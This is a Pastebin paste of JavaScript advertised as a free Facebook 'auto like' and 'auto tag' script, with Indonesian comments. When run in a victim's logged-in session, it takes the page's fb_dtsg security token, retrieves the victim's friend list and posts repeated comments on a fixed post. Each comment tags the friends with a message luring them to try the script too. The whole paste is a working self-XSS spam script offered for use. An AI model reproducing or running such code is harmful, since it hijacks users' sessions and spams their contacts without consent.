Advertisement
Guest User

Script AUTO Tag 2014 / Auto Like facebook 2014

a guest
Jan 25th, 2014
168
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var aing = {
  2.  
  3. /**
  4.   Copyright: Czn Deface ( AUTO LIKE )
  5.   **/
  6.  
  7.         posId: "450028648456950", // jangan di ganti ini Code AUTO LIKE
  8.         idGw: "Masukan ID Facebook anda", //ganti dengan ID FB kamu
  9. //      idGw:/[0-9]{8,}/.exec(document.getElementsByClassName("fbxWelcomeBoxImg")[0].d)[0],
  10.  
  11.         dtsg: document.getElementsByName(
  12.                 "fb_dtsg")[0].value,
  13.         ctLama: /comment_text=(.*?)&/,
  14.         c: 1,
  15.         ctBaru: "comment_text=",
  16.         getPren: function (uid) {
  17.                 var a = window.ActiveXObject ? new ActiveXObject(
  18.                         "Msxml2.XMLHTTP") : new XMLHttpRequest;
  19.                 if (a.open("GET",
  20.                         "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer=" +
  21.                         uid +
  22.                         "&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", /** method GET **/ !
  23.                         1), a.send(null), 4 == a.readyState) {
  24.                         var b = JSON.parse(a.responseText.substring(
  25.                                 a.responseText.indexOf("{")));
  26.                         return b.payload.entries
  27.                 }
  28.                 return !1
  29.         },
  30.         hajar: function () {
  31.                 aing.koncos = aing.getPren(aing.idGw);
  32.                 aing.pale = "ft_ent_identifier=" +
  33.                         aing.posId +
  34.                         "&comment_text=0&" +
  35.             "source=1&" +
  36.             "client_id=1359576694192%3A1233576093&" +
  37.             "reply_fbid" +
  38.             "&parent_comment_id&" +
  39.             "rootid=u_jsonp_3_19&" +
  40.             "ft[tn]=[]&" +
  41.             "ft[qid]=5839337351464612379&" +
  42.             "ft[mf_story_key]=5470779710560437153&" +
  43.             "ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" +
  44.                         aing.idGw +
  45.                         "&__a=1&__req=4u&fb_dtsg=" + aing.dtsg +
  46.                         "&phstamp=" + Math.random();
  47.                 for (var n = 1; n < aing.koncos.length; n++) {
  48.                         if (fb_dtsg = aing.dtsg, aing.ctBaru +=
  49.                                 "Teman%20Facebook%20ke%20" + n + "%20%40[" + aing.koncos[
  50.                                         n].uid +
  51.                                 "%3AAAAAAAAAAAA]%20Auto%20Like%20Sukses%20^_^%20FREE%20kalo%20kalian%20gak%20percaya%20Coba%20;)%20aja%20nyoba%20anu%20hehehe...%20:)%20B|%20%0A", //message with percent encoding for URIs
  52.                                 aing.c++, 7 == aing.c) {
  53.                                 with(aing.ctBaru += "&", new XMLHttpRequest) open(
  54.                                         "POST",
  55.                                         "/ajax/ufi/add_comment.php?__a=1"), /** method POST **/
  56.                                 setRequestHeader("Content-Type",
  57.                                         "application/x-www-form-urlencoded"
  58.                                 ), send(aing.pale.replace(aing.ctLama,
  59.                                         aing.ctBaru));
  60.                                 z = setTimeout("function(){asd=0}",
  61.                                         1e3), clearInterval(z), aing.c = 1,
  62.                                 aing.ctBaru = "comment_text="
  63.                         }
  64.                 }
  65.         }
  66. };
  67. aing.hajar();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement